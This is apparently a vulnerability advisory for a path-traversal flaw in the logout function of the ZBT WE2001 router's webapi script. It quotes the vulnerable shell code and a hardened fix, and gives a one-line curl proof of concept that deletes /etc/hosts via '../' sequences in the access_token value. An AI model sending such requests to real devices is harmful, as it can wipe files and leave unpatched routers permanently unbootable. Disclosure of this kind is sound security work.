Neutrino Security

Arbitrary file deletion via logout function

CVE ID: CVE-2025-64074
CVSS: N/A
CWE: CWE-22
AFFECTED COMPONENT: logout function
PRODUCT: WE2001
VERSION: V23.09.27
EXPLOITABILITY: Remote, unauthenticated
IMPACT: Arbitrary file deletion

Summary

A path-traversal vulnerability in the logout functionality of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to delete arbitrary files on the host by supplying a crafted session cookie value.

Details

The vulnerability exists in the logout operation within the webapi shell script. The application uses the access_token parameter to construct a file path for deletion without proper validation or sanitization.

The following webapi code extract demonstrates how the user input FORM_access_token (access_token) is directly concatenated into the rm command:

if [ "$op" == "logout" ];then
	if [ -n "$FORM_access_token" ];then
		rm /tmp/webapi_token/session/${FORM_access_token}
	fi

	json_init
	json_add_string code "1"
	json_add_string reason "success"

	echo -n "$(json_dump)"
fi

The script intends to delete a session file located inside /tmp/webapi_token/session/. However, because the rm command accepts the ${FORM_access_token} variable without filtering for directory traversal characters, an attacker can manipulate the path to point to any file on the system.

Prerequisites: For the traversal to successfully step out of the directory tree, the base path /tmp/webapi_token/session/ must exist. In a default installation, this directory is automatically created when at least one valid session is active. Therefore, the vulnerability relies on the presence of this temporary directory structure to serve as a pivot point.
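As an added illustration (not vendor code from the advisory), a hardened version of the logout branch: it rejects any access_token value that is not a plain alphanumeric identifier and only removes a regular file that already exists inside the session directory. The SESSION_DIR variable and the allowed token character set are assumptions about how the device issues tokens.

```shell
#!/bin/sh
# Added example, not the device's own webapi code.
# Assumption: tokens are opaque identifiers drawn from [A-Za-z0-9_-], at most 64 chars.
SESSION_DIR="${SESSION_DIR:-/tmp/webapi_token/session}"

# Returns 0 only for a non-empty token made of [A-Za-z0-9_-] and at most 64 characters.
# Slashes, dots, spaces and empty strings are rejected, so "../" sequences never reach rm.
is_valid_token() {
    tok="$1"
    [ -n "$tok" ] || return 1
    case "$tok" in
        *[!A-Za-z0-9_-]*) return 1 ;;
    esac
    [ "${#tok}" -le 64 ] || return 1
    return 0
}

# Removes the session file for a validated token.
# Returns 0 on success, 1 when the token is rejected or no such session exists.
safe_logout() {
    tok="$1"
    is_valid_token "$tok" || return 1
    target="$SESSION_DIR/$tok"
    # Second guard: only an existing regular file directly under SESSION_DIR is removed.
    [ -f "$target" ] || return 1
    rm -f -- "$target"
}
```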

PoC

To reproduce this vulnerability, an attacker can send a crafted HTTP request simply using curl.

In this case the payload uses path traversal sequences to traverse up from the session directory to the root directory and delete the /etc/hosts file.

PATH_TO_FILE="/etc/hosts"; 

curl --path-as-is -k "http://192.168.1.1/cgi-bin/webapi?op=logout&access_token=../../..${PATH_TO_FILE}"

Impact

Attackers can arbitrarily delete critical application data, configuration files, or even system binaries and boot configurations. This action can render the device completely unbootable, resulting in a Permanent Denial of Service.

Remediation

At the time of this publication, there is no official patch or remediation available from the vendor.

Disclosure Timeline

Date        Event
2025-10-23  Initial report sent to MITRE.
2025-11-12  CVE ID reserved/assigned by MITRE.
2026-02-11  Public disclosure.